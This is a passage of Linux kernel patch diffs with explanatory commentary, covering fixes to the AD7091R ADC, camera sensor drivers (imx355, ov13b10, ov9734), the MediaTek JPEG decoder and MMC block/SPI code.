++				     enum iio_event_type type,
++				     enum iio_event_direction dir,
++				     enum iio_event_info info, int val, int val2)
++{
++	struct ad7091r_state *st = iio_priv(indio_dev);
++
++	switch (info) {
++	case IIO_EV_INFO_VALUE:
++		switch (dir) {
++		case IIO_EV_DIR_RISING:
++			return regmap_write(st->map,
++					    AD7091R_REG_CH_HIGH_LIMIT(chan->channel),
++					    val);
++		case IIO_EV_DIR_FALLING:
++			return regmap_write(st->map,
++					    AD7091R_REG_CH_LOW_LIMIT(chan->channel),
++					    val);
++		default:
++			return -EINVAL;
++		}
++	case IIO_EV_INFO_HYSTERESIS:
++		return regmap_write(st->map,
++				    AD7091R_REG_CH_HYSTERESIS(chan->channel),
++				    val);
++	default:
++		return -EINVAL;
++	}
++}
++
+ static const struct iio_info ad7091r_info = {
+ 	.read_raw = ad7091r_read_raw,
++	.read_event_config = &ad7091r_read_event_config,
++	.write_event_config = &ad7091r_write_event_config,
++	.read_event_value = &ad7091r_read_event_value,
++	.write_event_value = &ad7091r_write_event_value,
+ };
+ 
+ static irqreturn_t ad7091r_event_handler(int irq, void *private)
+@@ -232,6 +389,11 @@ int ad7091r_probe(struct device *dev, const char *name,
+ 	iio_dev->channels = chip_info->channels;
+ 
+ 	if (irq) {
++		ret = regmap_update_bits(st->map, AD7091R_REG_CONF,
++					 AD7091R_REG_CONF_ALERT_EN, BIT(4));
++		if (ret)
++			return ret;
++
+ 		ret = devm_request_threaded_irq(dev, irq, NULL,
+ 				ad7091r_event_handler,
+ 				IRQF_TRIGGER_FALLING | IRQF_ONESHOT, name, iio_dev);
+@@ -243,7 +405,14 @@ int ad7091r_probe(struct device *dev, const char *name,
+ 	if (IS_ERR(st->vref)) {
+ 		if (PTR_ERR(st->vref) == -EPROBE_DEFER)
+ 			return -EPROBE_DEFER;
++
+ 		st->vref = NULL;
++		/* Enable internal vref */
++		ret = regmap_set_bits(st->map, AD7091R_REG_CONF,
++				      AD7091R_REG_CONF_INT_VREF);
++		if (ret)
++			return dev_err_probe(st->dev, ret,
++					     "Error enabling internal reference\n");
+ 	} else {
+ 		ret = regulator_enable(st->vref);
+ 		if (ret)
+diff --git a/drivers/iio/adc/ad7091r-base.h b/drivers/iio/adc/ad7091r-base.h
+index 509748aef9b19..b9e1c8bf3440a 100644
+--- a/drivers/iio/adc/ad7091r-base.h
++++ b/drivers/iio/adc/ad7091r-base.h
+@@ -8,6 +8,12 @@
+ #ifndef __DRIVERS_IIO_ADC_AD7091R_BASE_H__
+ #define __DRIVERS_IIO_ADC_AD7091R_BASE_H__
+ 
++#define AD7091R_REG_CONF_INT_VREF	BIT(0)
++
++/* AD7091R_REG_CH_LIMIT */
++#define AD7091R_HIGH_LIMIT		0xFFF
++#define AD7091R_LOW_LIMIT		0x0
++
+ struct device;
+ struct ad7091r_state;
+ 
+@@ -17,6 +23,8 @@ struct ad7091r_chip_info {
+ 	unsigned int vref_mV;
+ };
+ 
++extern const struct iio_event_spec ad7091r_events[3];
++
+ extern const struct regmap_config ad7091r_regmap_config;
+ 
+ int ad7091r_probe(struct device *dev, const char *name,
+diff --git a/drivers/iio/adc/ad7091r5.c b/drivers/iio/adc/ad7091r5.c
+index 47f5763023a40..12d475463945d 100644
+--- a/drivers/iio/adc/ad7091r5.c
++++ b/drivers/iio/adc/ad7091r5.c
+@@ -12,26 +12,6 @@
+ 
+ #include "ad7091r-base.h"
+ 
+-static const struct iio_event_spec ad7091r5_events[] = {
+-	{
+-		.type = IIO_EV_TYPE_THRESH,
+-		.dir = IIO_EV_DIR_RISING,
+-		.mask_separate = BIT(IIO_EV_INFO_VALUE) |
+-				 BIT(IIO_EV_INFO_ENABLE),
+-	},
+-	{
+-		.type = IIO_EV_TYPE_THRESH,
+-		.dir = IIO_EV_DIR_FALLING,
+-		.mask_separate = BIT(IIO_EV_INFO_VALUE) |
+-				 BIT(IIO_EV_INFO_ENABLE),
+-	},
+-	{
+-		.type = IIO_EV_TYPE_THRESH,
+-		.dir = IIO_EV_DIR_EITHER,
+-		.mask_separate = BIT(IIO_EV_INFO_HYSTERESIS),
+-	},
+-};
+-
+ #define AD7091R_CHANNEL(idx, bits, ev, num_ev) { \
+ 	.type = IIO_VOLTAGE, \
+ 	.info_mask_separate = BIT(IIO_CHAN_INFO_RAW), \
+@@ -44,10 +24,10 @@ static const struct iio_event_spec ad7091r5_events[] = {
+ 	.scan_type.realbits = bits, \
+ }
+ static const struct iio_chan_spec ad7091r5_channels_irq[] = {
+-	AD7091R_CHANNEL(0, 12, ad7091r5_events, ARRAY_SIZE(ad7091r5_events)),
+-	AD7091R_CHANNEL(1, 12, ad7091r5_events, ARRAY_SIZE(ad7091r5_events)),
+-	AD7091R_CHANNEL(2, 12, ad7091r5_events, ARRAY_SIZE(ad7091r5_events)),
+-	AD7091R_CHANNEL(3, 12, ad7091r5_events, ARRAY_SIZE(ad7091r5_events)),
++	AD7091R_CHANNEL(0, 12, ad7091r_events, ARRAY_SIZE(ad7091r_events)),
++	AD7091R_CHANNEL(1, 12, ad7091r_events, ARRAY_SIZE(ad7091r_events)),
++	AD7091R_CHANNEL(2, 12, ad7091r_events, ARRAY_SIZE(ad7091r_events)),
++	AD7091R_CHANNEL(3, 12, ad7091r_events, ARRAY_SIZE(ad7091r_events)),
+ };
+ 
+ static const struct iio_chan_spec ad7091r5_channels_noirq[] = {
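
The AD7091R refactor moves the threshold-event plumbing into the shared base driver: the event spec table and the read/write handlers now live in ad7091r-base.c, exported in the IIO_AD7091R symbol namespace, and the ad7091r5 variant just points its channels at them. The consuming side, sketched (AD7091R_CHANNEL is the macro defined in ad7091r5.c above):

	#include "ad7091r-base.h"

	static const struct iio_chan_spec my_channels[] = {
		AD7091R_CHANNEL(0, 12, ad7091r_events, ARRAY_SIZE(ad7091r_events)),
		AD7091R_CHANNEL(1, 12, ad7091r_events, ARRAY_SIZE(ad7091r_events)),
	};

	MODULE_IMPORT_NS(IIO_AD7091R);	/* pairs with EXPORT_SYMBOL_NS_GPL */
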
+diff --git a/drivers/media/common/videobuf2/videobuf2-dma-sg.c b/drivers/media/common/videobuf2/videobuf2-dma-sg.c
+index fa69158a65b1f..cb1e4bc69dba7 100644
+--- a/drivers/media/common/videobuf2/videobuf2-dma-sg.c
++++ b/drivers/media/common/videobuf2/videobuf2-dma-sg.c
+@@ -494,9 +494,15 @@ vb2_dma_sg_dmabuf_ops_end_cpu_access(struct dma_buf *dbuf,
+ static int vb2_dma_sg_dmabuf_ops_vmap(struct dma_buf *dbuf,
+ 				      struct iosys_map *map)
+ {
+-	struct vb2_dma_sg_buf *buf = dbuf->priv;
++	struct vb2_dma_sg_buf *buf;
++	void *vaddr;
++
++	buf = dbuf->priv;
++	vaddr = vb2_dma_sg_vaddr(buf->vb, buf);
++	if (!vaddr)
++		return -EINVAL;
+ 
+-	iosys_map_set_vaddr(map, buf->vaddr);
++	iosys_map_set_vaddr(map, vaddr);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/media/i2c/imx355.c b/drivers/media/i2c/imx355.c
+index b46178681c056..7fb02ba560121 100644
+--- a/drivers/media/i2c/imx355.c
++++ b/drivers/media/i2c/imx355.c
+@@ -1784,10 +1784,6 @@ static int imx355_probe(struct i2c_client *client)
+ 		goto error_handler_free;
+ 	}
+ 
+-	ret = v4l2_async_register_subdev_sensor(&imx355->sd);
+-	if (ret < 0)
+-		goto error_media_entity;
+-
+ 	/*
+ 	 * Device is already turned on by i2c-core with ACPI domain PM.
+ 	 * Enable runtime PM and turn off the device.
+@@ -1796,9 +1792,15 @@ static int imx355_probe(struct i2c_client *client)
+ 	pm_runtime_enable(&client->dev);
+ 	pm_runtime_idle(&client->dev);
+ 
++	ret = v4l2_async_register_subdev_sensor(&imx355->sd);
++	if (ret < 0)
++		goto error_media_entity_runtime_pm;
++
+ 	return 0;
+ 
+-error_media_entity:
++error_media_entity_runtime_pm:
++	pm_runtime_disable(&client->dev);
++	pm_runtime_set_suspended(&client->dev);
+ 	media_entity_cleanup(&imx355->sd.entity);
+ 
+ error_handler_free:
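
The imx355 reorder fixes a probe-time race: v4l2_async_register_subdev_sensor() makes the sensor visible to userspace immediately, so runtime PM must already be configured by then, and a late registration failure now has to unwind the PM state it set up. The tail of such a probe, as a hedged sketch (sensor_probe_tail is a hypothetical name):

	static int sensor_probe_tail(struct device *dev, struct v4l2_subdev *sd)
	{
		int ret;

		/* Make the device fully operational before publishing it. */
		pm_runtime_set_active(dev);
		pm_runtime_enable(dev);
		pm_runtime_idle(dev);

		ret = v4l2_async_register_subdev_sensor(sd);	/* now public */
		if (ret < 0)
			goto err_pm;

		return 0;

	err_pm:
		pm_runtime_disable(dev);
		pm_runtime_set_suspended(dev);	/* undo set_active() */
		return ret;
	}
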
+diff --git a/drivers/media/i2c/ov13b10.c b/drivers/media/i2c/ov13b10.c
+index 549e5d93e568e..368a3c2bfe349 100644
+--- a/drivers/media/i2c/ov13b10.c
++++ b/drivers/media/i2c/ov13b10.c
+@@ -589,6 +589,9 @@ struct ov13b10 {
+ 
+ 	/* Streaming on/off */
+ 	bool streaming;
++
++	/* True if the device has been identified */
++	bool identified;
+ };
+ 
+ #define to_ov13b10(_sd)	container_of(_sd, struct ov13b10, sd)
+@@ -1023,12 +1026,42 @@ ov13b10_set_pad_format(struct v4l2_subdev *sd,
+ 	return 0;
+ }
+ 
++/* Verify chip ID */
++static int ov13b10_identify_module(struct ov13b10 *ov13b)
++{
++	struct i2c_client *client = v4l2_get_subdevdata(&ov13b->sd);
++	int ret;
++	u32 val;
++
++	if (ov13b->identified)
++		return 0;
++
++	ret = ov13b10_read_reg(ov13b, OV13B10_REG_CHIP_ID,
++			       OV13B10_REG_VALUE_24BIT, &val);
++	if (ret)
++		return ret;
++
++	if (val != OV13B10_CHIP_ID) {
++		dev_err(&client->dev, "chip id mismatch: %x!=%x\n",
++			OV13B10_CHIP_ID, val);
++		return -EIO;
++	}
++
++	ov13b->identified = true;
++
++	return 0;
++}
++
+ static int ov13b10_start_streaming(struct ov13b10 *ov13b)
+ {
+ 	struct i2c_client *client = v4l2_get_subdevdata(&ov13b->sd);
+ 	const struct ov13b10_reg_list *reg_list;
+ 	int ret, link_freq_index;
+ 
++	ret = ov13b10_identify_module(ov13b);
++	if (ret)
++		return ret;
++
+ 	/* Get out of software reset */
+ 	ret = ov13b10_write_reg(ov13b, OV13B10_REG_SOFTWARE_RST,
+ 				OV13B10_REG_VALUE_08BIT, OV13B10_SOFTWARE_RST);
+@@ -1144,27 +1177,6 @@ error:
+ 	return ret;
+ }
+ 
+-/* Verify chip ID */
+-static int ov13b10_identify_module(struct ov13b10 *ov13b)
+-{
+-	struct i2c_client *client = v4l2_get_subdevdata(&ov13b->sd);
+-	int ret;
+-	u32 val;
+-
+-	ret = ov13b10_read_reg(ov13b, OV13B10_REG_CHIP_ID,
+-			       OV13B10_REG_VALUE_24BIT, &val);
+-	if (ret)
+-		return ret;
+-
+-	if (val != OV13B10_CHIP_ID) {
+-		dev_err(&client->dev, "chip id mismatch: %x!=%x\n",
+-			OV13B10_CHIP_ID, val);
+-		return -EIO;
+-	}
+-
+-	return 0;
+-}
+-
+ static const struct v4l2_subdev_video_ops ov13b10_video_ops = {
+ 	.s_stream = ov13b10_set_stream,
+ };
+@@ -1379,6 +1391,7 @@ out_err:
+ static int ov13b10_probe(struct i2c_client *client)
+ {
+ 	struct ov13b10 *ov13b;
++	bool full_power;
+ 	int ret;
+ 
+ 	/* Check HW config */
+@@ -1395,11 +1408,14 @@ static int ov13b10_probe(struct i2c_client *client)
+ 	/* Initialize subdev */
+ 	v4l2_i2c_subdev_init(&ov13b->sd, client, &ov13b10_subdev_ops);
+ 
+-	/* Check module identity */
+-	ret = ov13b10_identify_module(ov13b);
+-	if (ret) {
+-		dev_err(&client->dev, "failed to find sensor: %d\n", ret);
+-		return ret;
++	full_power = acpi_dev_state_d0(&client->dev);
++	if (full_power) {
++		/* Check module identity */
++		ret = ov13b10_identify_module(ov13b);
++		if (ret) {
++			dev_err(&client->dev, "failed to find sensor: %d\n", ret);
++			return ret;
++		}
+ 	}
+ 
+ 	/* Set default mode to max resolution */
+@@ -1423,21 +1439,27 @@ static int ov13b10_probe(struct i2c_client *client)
+ 		goto error_handler_free;
+ 	}
+ 
+-	ret = v4l2_async_register_subdev_sensor(&ov13b->sd);
+-	if (ret < 0)
+-		goto error_media_entity;
+ 
+ 	/*
+ 	 * Device is already turned on by i2c-core with ACPI domain PM.
+ 	 * Enable runtime PM and turn off the device.
+ 	 */
+-	pm_runtime_set_active(&client->dev);
++	/* Set the device's state to active if it's in D0 state. */
++	if (full_power)
++		pm_runtime_set_active(&client->dev);
+ 	pm_runtime_enable(&client->dev);
+ 	pm_runtime_idle(&client->dev);
+ 
++	ret = v4l2_async_register_subdev_sensor(&ov13b->sd);
++	if (ret < 0)
++		goto error_media_entity_runtime_pm;
++
+ 	return 0;
+ 
+-error_media_entity:
++error_media_entity_runtime_pm:
++	pm_runtime_disable(&client->dev);
++	if (full_power)
++		pm_runtime_set_suspended(&client->dev);
+ 	media_entity_cleanup(&ov13b->sd.entity);
+ 
+ error_handler_free:
+@@ -1457,6 +1479,7 @@ static void ov13b10_remove(struct i2c_client *client)
+ 	ov13b10_free_controls(ov13b);
+ 
+ 	pm_runtime_disable(&client->dev);
++	pm_runtime_set_suspended(&client->dev);
+ }
+ 
+ static const struct dev_pm_ops ov13b10_pm_ops = {
+@@ -1480,6 +1503,7 @@ static struct i2c_driver ov13b10_i2c_driver = {
+ 	},
+ 	.probe_new = ov13b10_probe,
+ 	.remove = ov13b10_remove,
++	.flags = I2C_DRV_ACPI_WAIVE_D0_PROBE,
+ };
+ 
+ module_i2c_driver(ov13b10_i2c_driver);
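
With I2C_DRV_ACPI_WAIVE_D0_PROBE the ov13b10 may be probed while the sensor is still powered off, so the chip-ID check can no longer live unconditionally in probe: it runs there only when the device is in D0, is retried from the first stream-on otherwise, and the identified flag makes whichever path wins a one-time cost. The lazy-identify pattern, with hypothetical sensor_* names:

	static int sensor_identify_once(struct sensor *s)
	{
		u32 id;
		int ret;

		if (s->identified)		/* already verified while powered */
			return 0;

		ret = sensor_read_id(s, &id);	/* hypothetical register read */
		if (ret)
			return ret;
		if (id != SENSOR_CHIP_ID)
			return -EIO;

		s->identified = true;		/* skip on every later stream-on */
		return 0;
	}
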
+diff --git a/drivers/media/i2c/ov9734.c b/drivers/media/i2c/ov9734.c
+index 8b0a158cb2972..c5592ddb0cffb 100644
+--- a/drivers/media/i2c/ov9734.c
++++ b/drivers/media/i2c/ov9734.c
+@@ -939,6 +939,7 @@ static void ov9734_remove(struct i2c_client *client)
+ 	media_entity_cleanup(&sd->entity);
+ 	v4l2_ctrl_handler_free(sd->ctrl_handler);
+ 	pm_runtime_disable(&client->dev);
++	pm_runtime_set_suspended(&client->dev);
+ 	mutex_destroy(&ov9734->mutex);
+ }
+ 
+@@ -984,13 +985,6 @@ static int ov9734_probe(struct i2c_client *client)
+ 		goto probe_error_v4l2_ctrl_handler_free;
+ 	}
+ 
+-	ret = v4l2_async_register_subdev_sensor(&ov9734->sd);
+-	if (ret < 0) {
+-		dev_err(&client->dev, "failed to register V4L2 subdev: %d",
+-			ret);
+-		goto probe_error_media_entity_cleanup;
+-	}
+-
+ 	/*
+ 	 * Device is already turned on by i2c-core with ACPI domain PM.
+ 	 * Enable runtime PM and turn off the device.
+@@ -999,9 +993,18 @@ static int ov9734_probe(struct i2c_client *client)
+ 	pm_runtime_enable(&client->dev);
+ 	pm_runtime_idle(&client->dev);
+ 
++	ret = v4l2_async_register_subdev_sensor(&ov9734->sd);
++	if (ret < 0) {
++		dev_err(&client->dev, "failed to register V4L2 subdev: %d",
++			ret);
++		goto probe_error_media_entity_cleanup_pm;
++	}
++
+ 	return 0;
+ 
+-probe_error_media_entity_cleanup:
++probe_error_media_entity_cleanup_pm:
++	pm_runtime_disable(&client->dev);
++	pm_runtime_set_suspended(&client->dev);
+ 	media_entity_cleanup(&ov9734->sd.entity);
+ 
+ probe_error_v4l2_ctrl_handler_free:
+diff --git a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
+index 3071b61946c3b..f911d3c7dd862 100644
+--- a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
++++ b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
+@@ -974,13 +974,13 @@ static void mtk_jpeg_dec_device_run(void *priv)
+ 	if (ret < 0)
+ 		goto dec_end;
+ 
+-	schedule_delayed_work(&jpeg->job_timeout_work,
+-			      msecs_to_jiffies(MTK_JPEG_HW_TIMEOUT_MSEC));
+-
+ 	mtk_jpeg_set_dec_src(ctx, &src_buf->vb2_buf, &bs);
+ 	if (mtk_jpeg_set_dec_dst(ctx, &jpeg_src_buf->dec_param, &dst_buf->vb2_buf, &fb))
+ 		goto dec_end;
+ 
++	schedule_delayed_work(&jpeg->job_timeout_work,
++			      msecs_to_jiffies(MTK_JPEG_HW_TIMEOUT_MSEC));
++
+ 	spin_lock_irqsave(&jpeg->hw_lock, flags);
+ 	mtk_jpeg_dec_reset(jpeg->reg_base);
+ 	mtk_jpeg_dec_set_config(jpeg->reg_base,
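
The mtk_jpeg change is watchdog ordering: the timeout work used to be armed before the source and destination buffers were validated, so a failed setup could bail out with the watchdog still pending and have it fire for a job that never reached the hardware. The safe shape, sketched with hypothetical setup helpers:

	if (setup_src(ctx, src) || setup_dst(ctx, dst))
		goto job_end;			/* nothing armed yet */

	schedule_delayed_work(&jpeg->job_timeout_work,
			      msecs_to_jiffies(MTK_JPEG_HW_TIMEOUT_MSEC));
	start_decode_hw(ctx);	/* from here, the completion IRQ or the
				   timeout handler owns the pending work */
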
+diff --git a/drivers/mmc/core/block.c b/drivers/mmc/core/block.c
+index e9ce53d200bc1..ea60efaecb0dd 100644
+--- a/drivers/mmc/core/block.c
++++ b/drivers/mmc/core/block.c
+@@ -402,6 +402,10 @@ struct mmc_blk_ioc_data {
+ 	struct mmc_ioc_cmd ic;
+ 	unsigned char *buf;
+ 	u64 buf_bytes;
++	unsigned int flags;
++#define MMC_BLK_IOC_DROP	BIT(0)	/* drop this mrq */
++#define MMC_BLK_IOC_SBC	BIT(1)	/* use mrq.sbc */
++
+ 	struct mmc_rpmb_data *rpmb;
+ };
+ 
+@@ -467,7 +471,7 @@ static int mmc_blk_ioctl_copy_to_user(struct mmc_ioc_cmd __user *ic_ptr,
+ }
+ 
+ static int __mmc_blk_ioctl_cmd(struct mmc_card *card, struct mmc_blk_data *md,
+-			       struct mmc_blk_ioc_data *idata)
++			       struct mmc_blk_ioc_data **idatas, int i)
+ {
+ 	struct mmc_command cmd = {}, sbc = {};
+ 	struct mmc_data data = {};
+@@ -477,10 +481,18 @@ static int __mmc_blk_ioctl_cmd(struct mmc_card *card, struct mmc_blk_data *md,
+ 	unsigned int busy_timeout_ms;
+ 	int err;
+ 	unsigned int target_part;
++	struct mmc_blk_ioc_data *idata = idatas[i];
++	struct mmc_blk_ioc_data *prev_idata = NULL;
+ 
+ 	if (!card || !md || !idata)
+ 		return -EINVAL;
+ 
++	if (idata->flags & MMC_BLK_IOC_DROP)
++		return 0;
++
++	if (idata->flags & MMC_BLK_IOC_SBC)
++		prev_idata = idatas[i - 1];
++
+ 	/*
+ 	 * The RPMB accesses comes in from the character device, so we
+ 	 * need to target these explicitly. Else we just target the
+@@ -547,7 +559,7 @@ static int __mmc_blk_ioctl_cmd(struct mmc_card *card, struct mmc_blk_data *md,
+ 			return err;
+ 	}
+ 
+-	if (idata->rpmb) {
++	if (idata->rpmb || prev_idata) {
+ 		sbc.opcode = MMC_SET_BLOCK_COUNT;
+ 		/*
+ 		 * We don't do any blockcount validation because the max size
+@@ -555,6 +567,8 @@ static int __mmc_blk_ioctl_cmd(struct mmc_card *card, struct mmc_blk_data *md,
+ 		 * 'Reliable Write' bit here.
+ 		 */
+ 		sbc.arg = data.blocks | (idata->ic.write_flag & BIT(31));
++		if (prev_idata)
++			sbc.arg = prev_idata->ic.arg;
+ 		sbc.flags = MMC_RSP_R1 | MMC_CMD_AC;
+ 		mrq.sbc = &sbc;
+ 	}
+@@ -572,6 +586,15 @@ static int __mmc_blk_ioctl_cmd(struct mmc_card *card, struct mmc_blk_data *md,
+ 	mmc_wait_for_req(card->host, &mrq);
+ 	memcpy(&idata->ic.response, cmd.resp, sizeof(cmd.resp));
+ 
++	if (prev_idata) {
++		memcpy(&prev_idata->ic.response, sbc.resp, sizeof(sbc.resp));
++		if (sbc.error) {
++			dev_err(mmc_dev(card->host), "%s: sbc error %d\n",
++							__func__, sbc.error);
++			return sbc.error;
++		}
++	}
++
+ 	if (cmd.error) {
+ 		dev_err(mmc_dev(card->host), "%s: cmd error %d\n",
+ 						__func__, cmd.error);
+@@ -1057,6 +1080,20 @@ static inline void mmc_blk_reset_success(struct mmc_blk_data *md, int type)
+ 	md->reset_done &= ~type;
+ }
+ 
++static void mmc_blk_check_sbc(struct mmc_queue_req *mq_rq)
++{
++	struct mmc_blk_ioc_data **idata = mq_rq->drv_op_data;
++	int i;
++
++	for (i = 1; i < mq_rq->ioc_count; i++) {
++		if (idata[i - 1]->ic.opcode == MMC_SET_BLOCK_COUNT &&
++		    mmc_op_multi(idata[i]->ic.opcode)) {
++			idata[i - 1]->flags |= MMC_BLK_IOC_DROP;
++			idata[i]->flags |= MMC_BLK_IOC_SBC;
++		}
++	}
++}
++
+ /*
+  * The non-block commands come back from the block layer after it queued it and
+  * processed it with all other requests and then they get issued in this
+@@ -1084,11 +1121,14 @@ static void mmc_blk_issue_drv_op(struct mmc_queue *mq, struct request *req)
+ 			if (ret)
+ 				break;
+ 		}
++
++		mmc_blk_check_sbc(mq_rq);
++
+ 		fallthrough;
+ 	case MMC_DRV_OP_IOCTL_RPMB:
+ 		idata = mq_rq->drv_op_data;
+ 		for (i = 0, ret = 0; i < mq_rq->ioc_count; i++) {
+-			ret = __mmc_blk_ioctl_cmd(card, md, idata[i]);
++			ret = __mmc_blk_ioctl_cmd(card, md, idata, i);
+ 			if (ret)
+ 				break;
+ 		}
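
The mmc block changes let a user-supplied CMD23 travel with the transfer it belongs to: in an MMC_IOC_MULTI_CMD sequence, a SET_BLOCK_COUNT immediately followed by a multi-block command is dropped as a standalone request (MMC_BLK_IOC_DROP) and re-issued as the transfer's mrq.sbc with its original argument (MMC_BLK_IOC_SBC), which is how cards expect the pair to arrive. The userspace view, as a hedged sketch (data buffer and response flags elided; assumes <linux/mmc/ioctl.h> and an open block-device fd):

	struct mmc_ioc_multi_cmd *mc;

	mc = calloc(1, sizeof(*mc) + 2 * sizeof(struct mmc_ioc_cmd));
	mc->num_of_cmds = 2;
	mc->cmds[0].opcode = 23;	/* MMC_SET_BLOCK_COUNT */
	mc->cmds[0].arg = nblocks;
	mc->cmds[1].opcode = 25;	/* MMC_WRITE_MULTIPLE_BLOCK */
	mc->cmds[1].write_flag = 1;
	/* ... buffer setup and response flags elided ... */
	ioctl(fd, MMC_IOC_MULTI_CMD, mc);
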
+diff --git a/drivers/mmc/host/mmc_spi.c b/drivers/mmc/host/mmc_spi.c
+index cc333ad67cac8..2a99ffb61f8c0 100644
+--- a/drivers/mmc/host/mmc_spi.c
++++ b/drivers/mmc/host/mmc_spi.c
+@@ -15,7 +15,7 @@
+ #include <linux/slab.h>
+ #include <linux/module.h>
+ #include <linux/bio.h>
+-#include <linux/dma-mapping.h>
++#include <linux/dma-direction.h>
+ #include <linux/crc7.h>
+ #include <linux/crc-itu-t.h>
+ #include <linux/scatterlist.h>
+@@ -119,19 +119,14 @@ struct mmc_spi_host {
+ 	struct spi_transfer	status;
+ 	struct spi_message	readback;
+ 
+-	/* underlying DMA-aware controller, or null */
+-	struct device		*dma_dev;
+-
+ 	/* buffer used for commands and for message "overhead" */
+ 	struct scratch		*data;
+-	dma_addr_t		data_dma;
+ 
+ 	/* Specs say to write ones most of the time, even when the card
+ 	 * has no need to read its input data; and many cards won't care.
+ 	 * This is our source of those ones.
+ 	 */
+ 	void			*ones;
+-	dma_addr_t		ones_dma;
+ };
+ 
+ 
+@@ -147,11 +142,8 @@ static inline int mmc_cs_off(struct mmc_spi_host *host)
+ 	return spi_setup(host->spi);
+ }
+ 
+-static int
+-mmc_spi_readbytes(struct mmc_spi_host *host, unsigned len)
++static int mmc_spi_readbytes(struct mmc_spi_host *host, unsigned int len)
+ {
+-	int status;
+-
+ 	if (len > sizeof(*host->data)) {
+ 		WARN_ON(1);
+ 		return -EIO;
+@@ -159,19 +151,7 @@ mmc_spi_readbytes(struct mmc_spi_host *host, unsigned len)
+ 
+ 	host->status.len = len;
+ 
+-	if (host->dma_dev)
+-		dma_sync_single_for_device(host->dma_dev,
+-				host->data_dma, sizeof(*host->data),
+-				DMA_FROM_DEVICE);
+-
+-	status = spi_sync_locked(host->spi, &host->readback);
+-
+-	if (host->dma_dev)
+-		dma_sync_single_for_cpu(host->dma_dev,
+-				host->data_dma, sizeof(*host->data),
+-				DMA_FROM_DEVICE);
+-
+-	return status;
++	return spi_sync_locked(host->spi, &host->readback);
+ }
+ 
+ static int mmc_spi_skip(struct mmc_spi_host *host, unsigned long timeout,
+@@ -506,23 +486,11 @@ mmc_spi_command_send(struct mmc_spi_host *host,
+ 	t = &host->t;
+ 	memset(t, 0, sizeof(*t));
+ 	t->tx_buf = t->rx_buf = data->status;
+-	t->tx_dma = t->rx_dma = host->data_dma;
+ 	t->len = cp - data->status;
+ 	t->cs_change = 1;
+ 	spi_message_add_tail(t, &host->m);
+ 
+-	if (host->dma_dev) {
+-		host->m.is_dma_mapped = 1;
+-		dma_sync_single_for_device(host->dma_dev,
+-				host->data_dma, sizeof(*host->data),
+-				DMA_BIDIRECTIONAL);
+-	}
+ 	status = spi_sync_locked(host->spi, &host->m);
+-
+-	if (host->dma_dev)
+-		dma_sync_single_for_cpu(host->dma_dev,
+-				host->data_dma, sizeof(*host->data),
+-				DMA_BIDIRECTIONAL);
+ 	if (status < 0) {
+ 		dev_dbg(&host->spi->dev, "  ... write returned %d\n", status);
+ 		cmd->error = status;
+@@ -540,9 +508,6 @@ mmc_spi_command_send(struct mmc_spi_host *host,
+  * We always provide TX data for data and CRC.  The MMC/SD protocol
+  * requires us to write ones; but Linux defaults to writing zeroes;
+  * so we explicitly initialize it to all ones on RX paths.
+- *
+- * We also handle DMA mapping, so the underlying SPI controller does
+- * not need to (re)do it for each message.
+  */
+ static void
+ mmc_spi_setup_data_message(
+@@ -552,11 +517,8 @@ mmc_spi_setup_data_message(
+ {
+ 	struct spi_transfer	*t;
+ 	struct scratch		*scratch = host->data;
+-	dma_addr_t		dma = host->data_dma;
+ 
+ 	spi_message_init(&host->m);
+-	if (dma)
+-		host->m.is_dma_mapped = 1;
+ 
+ 	/* for reads, readblock() skips 0xff bytes before finding
+ 	 * the token; for writes, this transfer issues that token.
+@@ -570,8 +532,6 @@ mmc_spi_setup_data_message(
+ 		else
+ 			scratch->data_token = SPI_TOKEN_SINGLE;
+ 		t->tx_buf = &scratch->data_token;
+-		if (dma)
+-			t->tx_dma = dma + offsetof(struct scratch, data_token);
+ 		spi_message_add_tail(t, &host->m);
+ 	}
+ 
+@@ -581,7 +541,6 @@ mmc_spi_setup_data_message(
+ 	t = &host->t;
+ 	memset(t, 0, sizeof(*t));
+ 	t->tx_buf = host->ones;
+-	t->tx_dma = host->ones_dma;
+ 	/* length and actual buffer info are written later */
+ 	spi_message_add_tail(t, &host->m);
+ 
+@@ -591,14 +550,9 @@ mmc_spi_setup_data_message(
+ 	if (direction == DMA_TO_DEVICE) {
+ 		/* the actual CRC may get written later */
+ 		t->tx_buf = &scratch->crc_val;
+-		if (dma)
+-			t->tx_dma = dma + offsetof(struct scratch, crc_val);
+ 	} else {
+ 		t->tx_buf = host->ones;
+-		t->tx_dma = host->ones_dma;
+ 		t->rx_buf = &scratch->crc_val;
+-		if (dma)
+-			t->rx_dma = dma + offsetof(struct scratch, crc_val);
+ 	}
+ 	spi_message_add_tail(t, &host->m);
+ 
+@@ -621,10 +575,7 @@ mmc_spi_setup_data_message(
+ 		memset(t, 0, sizeof(*t));
+ 		t->len = (direction == DMA_TO_DEVICE) ? sizeof(scratch->status) : 1;
+ 		t->tx_buf = host->ones;
+-		t->tx_dma = host->ones_dma;
+ 		t->rx_buf = scratch->status;
+-		if (dma)
+-			t->rx_dma = dma + offsetof(struct scratch, status);
+ 		t->cs_change = 1;
+ 		spi_message_add_tail(t, &host->m);
+ 	}
+@@ -653,23 +604,13 @@ mmc_spi_writeblock(struct mmc_spi_host *host, struct spi_transfer *t,
+ 
+ 	if (host->mmc->use_spi_crc)
+ 		scratch->crc_val = cpu_to_be16(crc_itu_t(0, t->tx_buf, t->len));
+-	if (host->dma_dev)
+-		dma_sync_single_for_device(host->dma_dev,
+-				host->data_dma, sizeof(*scratch),
+-				DMA_BIDIRECTIONAL);
+ 
+ 	status = spi_sync_locked(spi, &host->m);
+-
+ 	if (status != 0) {
+ 		dev_dbg(&spi->dev, "write error (%d)\n", status);
+ 		return status;
+ 	}
+ 
+-	if (host->dma_dev)
+-		dma_sync_single_for_cpu(host->dma_dev,
+-				host->data_dma, sizeof(*scratch),
+-				DMA_BIDIRECTIONAL);
+-
+ 	/*
+ 	 * Get the transmission data-response reply.  It must follow
+ 	 * immediately after the data block we transferred.  This reply
+@@ -718,8 +659,6 @@ mmc_spi_writeblock(struct mmc_spi_host *host, struct spi_transfer *t,
+ 	}
+ 
+ 	t->tx_buf += t->len;
+-	if (host->dma_dev)
+-		t->tx_dma += t->len;
+ 
+ 	/* Return when not busy.  If we didn't collect that status yet,
+ 	 * we'll need some more I/O.
